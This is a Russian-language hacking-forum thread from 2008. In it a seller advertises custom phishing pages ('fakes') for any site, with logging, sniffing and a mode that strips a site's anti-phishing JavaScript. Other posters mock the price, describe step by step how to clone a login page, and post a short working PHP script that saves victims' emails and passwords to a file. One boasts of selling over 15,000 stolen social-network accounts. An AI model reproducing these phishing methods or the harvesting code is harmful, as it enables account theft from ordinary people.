Просмотр полной версии : Фейки
Делаю фейк для любого сайта. К фейку прилагается скрипт для просмотра логов и управления им. Систему можно настраивать под свои нужды изменением файла с настройками. Фейк имеет функции сниффера, вплоть до оределения неанонимного прокси у пользователя.
Новшество "мыльного" варианта: скрин почтового ящика, даже если жертва не станет вводить свои данные.
Могу создать динамический фейк - страница грузится с настоящего сервера, подменяется адрес к скрипту авторизации на фейковый, убирается защитный яваскрипт.
Сроки работы - до двух дней. Цена 1 фейка - 10 WMZ.
Без предоплаты.
================================================== ====
ICQ 407338957
Сроки работы - до двух дней.
ппц... научи мну
Делаю фейк для любого сайта. К фейку прилагается скрипт для просмотра логов и управления им. Систему можно настраивать под свои нужды изменением файла с настройками. Фейк имеет функции сниффера, вплоть до оределения неанонимного прокси у пользователя.
Новшество "мыльного" варианта: скрин почтового ящика, даже если жертва не станет вводить свои данные.
Могу создать динамический фейк - страница грузится с настоящего сервера, подменяется адрес к скрипту авторизации на фейковый, убирается защитный яваскрипт.
Сроки работы - до двух дней. Цена 1 фейка - 10 WMZ.
Без предоплаты.
================================================== ====
ICQ 407338957
за 10 баксов?О**ел чели?Я любой фейк за бесплатно сделаю
oldschool
30.12.2008, 18:16
жди отаке школьнеков) каникулы как раз )))
за 10 баксов?О**ел чели?Я любой фейк за бесплатно сделаю
Представляю какой фейк ты сбацаешь))) Ггг
жди отаке школьнеков) каникулы как раз )))
Ни**я)))
Представляю какой фейк ты сбацаешь))) Ггг
Я та сбацаю получше тебя =)
тс, чет халтуришь, я фейк одноклашек за 23 минуты намутил))) да и ваще фейки писать оооочень легко,открываешь оперой, сохраняешь как хтмл с картинками, находишь форму авторизухи, сохраняешь поля name , перегоняешь авторизуху на пхп файл, в котором сохраняються данные этих 2 переменных и все-нету тут за что плотить 10$
тс, чет халтуришь, я фейк одноклашек за 23 минуты намутил))) да и ваще фейки писать оооочень легко,открываешь оперой, сохраняешь как хтмл с картинками, находишь форму авторизухи, сохраняешь поля name , перегоняешь авторизуху на пхп файл, в котором сохраняються данные этих 2 переменных и все-нету тут за что плотить 10$
Фейк не такой каких навалом в сети))) Много функций и удобный вид.
Я та сбацаю получше тебя =)
Ты просто моего не видел фейка =) Но всякое возможно)
удобный вид.
:D
И какой понт его вообще делать если ты делаешь другой вид? :D
mailbrush
30.12.2008, 19:23
И какой понт его вообще делать если ты делаешь другой вид?
+1
Много функций и удобный вид.
Ухаха... Ну ты даешь... Для понта сказал, правда?
http://forum.antichat.ru/showpost.php?p=1017337&postcount=1 - вот! ФЕЙКИ Нашару ВСЕМ!
:D
И какой понт его вообще делать если ты делаешь другой вид? :D
Сам понял что сказал? Главное функционал, хотя наверно функция бота по обработке реферер вам ничего не говорит и вряд ли скажет в ближайшее время xDDD
Ухаха... Ну ты даешь... Для понта сказал, правда?
http://forum.antichat.ru/showpost.php?p=1017337&postcount=1 - вот! ФЕЙКИ Нашару ВСЕМ!
Ну ну... посмотрел я на те "фейки" и посмеялся... пользуйтесь, как говориться, на здоровье!
spy-profi
30.12.2008, 19:39
Парень молодец ! Сделал скидочку и оформил все как надо респект ^^
mailbrush
30.12.2008, 19:45
Ну ну... посмотрел я на те "фейки" и посмеялся... пользуйтесь, как говориться, на здоровье!
Ну-ну... делаю я обычной записью в txt файл вида login:pass, а если ты делаешь запись в пхп файлы с интерфейсом, то не думай что ты тут круче всех. Я тоже умею... в "$send =" только дописать кое-что надо...
Ну-ну... делаю я обычной записью в txt файл вида login:pass, а если ты делаешь запись в пхп файлы с интерфейсом, то не думай что ты тут круче всех. Я тоже умею... в "$send =" только дописать кое-что надо...
Вообще то тут откровенных понтов не было, тем более идеи превосходства над кем то. Сбацать фейк может и легко, а защитить его от взлома, неправильной обработке данных и т.д - это уже другое.
combatsxx
30.12.2008, 19:52
>mailbrush
уху в блокнотек самоее то..
и вообще 1 фейк сделай сам и вкуриш как мутить под многие сайты .
mailbrush
30.12.2008, 19:56
и вообще 1 фейк сделай сам и вкуриш как мутить под многие сайты .
Ты хочешь сказать, что я эти фейки делал не сам ? о_О :D
Нде...
Фейк не такой каких навалом в сети))) Много функций и удобный вид.
тоесть по мимо главной функции сохранения данных. он так же имеет чат, одминку от сутры а так же предостовляет возможность смотреть онлайн телевидение,читать газеты и играть в КС из браузера?
<?php
$f=fopen("lol.txt","at");
flock($f,2);
fputs($f, $_POST['email'].";".$_POST['password']." \n");
flock($f,3);
fclose($f);
?>
вот и весь фейк твои.
<?php
$f=fopen("lol.txt","at");
flock($f,2);
fputs($f, $_POST['email'].";".$_POST['password']." \n");
flock($f,3);
fclose($f);
?>
вот и весь фейк твои.
Во первых, ты не смотрел исходники. Для справки - примерно 250 строк кода, не считая основной страницы, подделывающей сайт. Во вторых, исходя из первого утверждения это, мягко говоря балабольство. И в третьих, если вы не уверены, просьба здесь не отписываться(или вы все в "Покупка и продажа" бестолку глумиться привыкли? если не знал, то сорри).
P.s "Сроки работы до двух дней" - на самом деле срок около 15 минут, скрипт подредактировать и страничку обработать. Это всмысле если не будет времени, то отвечу в течение 2 дней.
preda1or
30.12.2008, 22:57
что можно написать в фейке,на 250 строк кода?мир ебнулсо?
что можно написать в фейке,на 250 строк кода?мир ебнулсо?
Так получилось. Если подсчитать чистый код без комментариев и пустых строк, то где то 210.
Например админка - около 80 чистых строчек. По твоему это удивительно? Хотя для кого как... xDD
mailbrush
31.12.2008, 14:30
Up! Новогодние скидки)
Правила почитай...
Если нужно, помогу настроить, обьясню принцип работы фейков, методы получения акков и т.д
Во первых, ты не смотрел исходники. Для справки - примерно 250 строк кода, не считая основной страницы, подделывающей сайт. Во вторых, исходя из первого утверждения это, мягко говоря балабольство. И в третьих, если вы не уверены, просьба здесь не отписываться(или вы все в "Покупка и продажа" бестолку глумиться привыкли? если не знал, то сорри).
P.s "Сроки работы до двух дней" - на самом деле срок около 15 минут, скрипт подредактировать и страничку обработать. Это всмысле если не будет времени, то отвечу в течение 2 дней.
ласось ты))) я сам писал фейк одноклассников и контакта, и в сумме продал больше 15к акков, думаю количество акков говорит за качество фейка)))
Суть не в том, что ТС предлагает свои услуги по непонятно какой теме.
Суть в том - "нах*я козе боян?". Если человек не может сам и фейк написать -- зачем вообще браться за это дело?
НАпиши мне фейк с переводчиком))
http://forum.antichat.ru/threadedpost1031859.html
написал подробную статейку.
написал подробную статейку.
Фейк контакта и одноклассников очень легко сбацать. Те, которые этого не знают(ньюбы) с радостью побегут переписывать исходник из статьи.
Вот только если они захотят сделать фейк посерьёзнее, то их увы ждёт облом. Антифишинговый скрипт, встроенный в исходный код. Сохранят страницу на диск, запустят - и тут же переадресуются на настоящий сайт)))
Вот ты что то понтовался 15к акками, ну и? При грамотном спаме можно и не такое кол-во набрать. И в качестве фейка юзать всеми известный боянистный шестистроковый вариант.
П.С Поздравляю с первой статьёй))) Напиши в конце: "Я пишу статьи сугубо из желания лишить покупателей всех конкурентов и стать монополией". Не волнуйся, покупатели имеются и без ачата =)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot